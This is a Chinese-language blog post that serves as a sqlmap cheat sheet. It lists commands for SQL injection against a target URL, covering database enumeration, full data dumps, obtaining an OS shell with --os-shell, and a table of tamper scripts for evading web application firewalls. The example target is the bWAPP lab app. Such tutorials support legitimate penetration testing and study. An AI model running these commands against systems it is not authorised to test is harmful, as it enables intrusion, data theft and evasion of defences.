MENU

sqlmap使用

August 11, 2021 • Read: 693 • Web

sqlmap使用

常规用法:

#GET型:
sqlmap -u "URL" #使用默认等级来跑,注意URL里要带上一个可能存在注入的参数
#例子
-u "http://ip/bWAPP/sqli_1.php?title=1&action=search" #title可能存在注入
sqlmap -u "URL" --current-db --tables --columns #获取当前数据库的库名,库下的所有表,表中所有的字段

sqlmap -u "URL" --cookie ""  #对于要登录的网站需要添加cookie值

#POST型
#三种不同的注入方式
1. sqlmap -u "URL" --forms #自动寻找表单中可能存在注入的参数
2. sqlmap -u "URL" --data " " #指定参数进行注入
3. sqlmap -r "./*.txt" #加载文件中的http请求。可以用burp获取,也可以在浏览器调试获取

高阶用法

--os-shell #获取主机的权限,需要mysql开启写入权限,一般要求自己输入web服务器可写的目录【选项2】
--dump -D 库名 -T 表名 -C 字段名 #获取字段中的数据
--delay 10 #设置两次hhtp请求的时延为10s
--safe-url #每隔一段时间去访问一个正常的页面
-v["x"] #指定回显的复杂程度,可取范围0-6。详细可见下方列表
--level #设定测试的深度,默认是1,2是测试cookie注入,3是user-agent或refer注入 5是host注入。也可以请求单对应参数后添加*号,用-r加载文件即可

使用指南

所有参数详解点击
sqlmap详细使用

  1. bash
-u 指定目标URL (可以是http协议也可以是https协议)
-d 连接数据库
--dbs 列出所有的数据库
--current-db 列出当前数据库
--tables 列出当前的表
--columns 列出当前的列
-D 选择使用哪个数据库
-T 选择使用哪个表
-C 选择使用哪个列
--dump 获取字段中的数据
--batch 自动选择yes
--smart 启发式快速判断,节约浪费时间
--forms 尝试使用post注入
-r 加载文件中的HTTP请求(本地保存的请求包txt文件)
-l 加载文件中的HTTP请求(本地保存的请求包日志文件)
-g 自动获取Google搜索的前一百个结果,对有GET参数的URL测试
-o 开启所有默认性能优化
--tamper 调用脚本进行注入
-v 指定sqlmap的回显等级
--delay 设置多久访问一次
--os-shell 获取主机shell,一般不太好用,因为没权限
-m 批量检测,加载文件中的URL
--count 获取表中的数据个数
--start 1 --stop 10 --dump 导出十条数据
--dump-all 脱裤down下所有数据
-c 指定配置文件,会按照该配置文件执行动作
-data data指定的数据会当做post数据提交
-timeout 设定超时时间
-level 设置注入探测等级
--risk 风险等级
--identify-waf 检测防火墙类型
--param-del="分割符" 设置参数的分割符
--skip-urlencode 不进行url编码
--keep-alive 设置持久连接,加快探测速度
--null-connection 检索没有body响应的内容,多用于盲注
--thread 最大为10 设置多线程

2.

--tamper=脚本名称 #使用内置脚本绕过waf
apostrophemask.py              用UTF-8全角字符替换单引号字符
apostrophenullencode.py        用非法双字节unicode字符替换单引号字符
appendnullbyte.py              在payload末尾添加空字符编码
base64encode.py                对给定的payload全部字符使用Base64编码
between.py                     分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”
bluecoat.py                    在SQL语句之后用有效的随机空白符替换空格符,随后用“LIKE”替换等于号“=”
chardoubleencode.py            对给定的payload全部字符使用双重URL编码(不处理已经编码的字符)
charencode.py                  对给定的payload全部字符使用URL编码(不处理已经编码的字符)
charunicodeencode.py           对给定的payload的非编码字符使用Unicode URL编码(不处理已经编码的字符)
concat2concatws.py            用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例
equaltolike.py                用“LIKE”运算符替换全部等于号“=”
greatest.py                   用“GREATEST”函数替换大于号“>”
halfversionedmorekeywords.py  在每个关键字之前添加MySQL注释
ifnull2ifisnull.py            用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例
lowercase.py                  用小写值替换每个关键字字符
modsecurityversioned.py       用注释包围完整的查询
modsecurityzeroversioned.py   用当中带有数字零的注释包围完整的查询
multiplespaces.py             在SQL关键字周围添加多个空格
nonrecursivereplacement.py    用representations替换预定义SQL关键字,适用于过滤器
overlongutf8.py               转换给定的payload当中的所有字符
percentage.py                 在每个字符之前添加一个百分号
randomcase.py                 随机转换每个关键字字符的大小写
randomcomments.py             向SQL关键字中插入随机注释
securesphere.py               添加经过特殊构造的字符串
sp_password.py                向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs
space2comment.py              用“/**/”替换空格符
space2dash.py                 用破折号注释符“--”其次是一个随机字符串和一个换行符替换空格符
space2hash.py                 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2morehash.py             用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2mssqlblank.py           用一组有效的备选字符集当中的随机空白符替换空格符
space2mssqlhash.py            用磅注释符“#”其次是一个换行符替换空格符
space2mysqlblank.py           用一组有效的备选字符集当中的随机空白符替换空格符
space2mysqldash.py            用破折号注释符“--”其次是一个换行符替换空格符
space2plus.py                 用加号“+”替换空格符
space2randomblank.py          用一组有效的备选字符集当中的随机空白符替换空格符
unionalltounion.py            用“UNION SELECT”替换“UNION ALL SELECT”
unmagicquotes.py              用一个多字节组合%bf%27和末尾通用注释一起替换空格符 宽字节注入
varnish.py                    添加一个HTTP头“X-originating-IP”来绕过WAF
versionedkeywords.py          用MySQL注释包围每个非函数关键字
versionedmorekeywords.py      用MySQL注释包围每个关键字
xforwardedfor.py              添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF

3.

0 只显示python错误以及严重信息
1 同时显示基本信息和警告信息
2 同时显示debug信息
3 同时显示注入的pyload
4 同时显示HTTP请求
5 同时显示HTTP相应头
6 同时显示HTTP相应页面
Last Modified: March 7, 2022
Leave a Comment

本站总访问量 32666 次